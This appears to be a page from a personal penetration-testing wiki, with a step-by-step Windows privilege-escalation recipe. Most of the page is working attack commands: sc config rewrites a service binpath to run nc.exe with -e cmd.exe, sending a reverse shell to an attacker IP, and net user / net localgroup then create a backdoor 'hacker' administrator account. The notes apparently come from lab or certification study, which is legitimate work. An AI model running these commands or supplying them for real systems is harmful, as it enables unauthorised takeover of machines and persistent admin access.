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Editable Service

TheGetch edited this page Jan 5, 2021 · 1 revision

Editable Service

Editable Service

If you find a service that is editable (WinPEAS can help here to find such services) you can edit the binpath to point to nc.exe to get a reverse shell.

Steps also described here:

Note: in both my experiences using this, this does get shell, but it closes in a few seconds.

  1. Upload nc.exe to a writable directory.
  2. sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv <kali_IP> 9988 -e C:\Windows\System32\cmd.exe"
  3. sc config usosvc obj= ".\LocalSystem" password= ""
    • I didn't need this second time using it
  4. sc config usosvc start= "demand"
  5. nc -lvp 9988 (setup listener on kali)
  6. net start usosvc
  7. R00T!

Since shell closes soon, add new admin user:

  1. net user hacker h@ck3r%93 /add
  2. net localgroup administrators hacker /add

Now RDP/ssh with new creds (if services are available, or you can open them yourself):

  1. rdesktop <target>
  2. R00T!

The shell closes due to a Windows timeout variable in the registry that defines how long to wait for a service to response. If you're in a position to edit that (i.e. ssh/rdp not enabled) this would stabilize the shell. If you don’t want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH.


1. Recon

Ping Sweep


2. Enumeration


05. HTTP (80,443,8080,8443,etc.)

3. Exploitation

4. Post Exploiation

5. High Value Information


6. Reporting

7. Random Notes/Useful Tidbits

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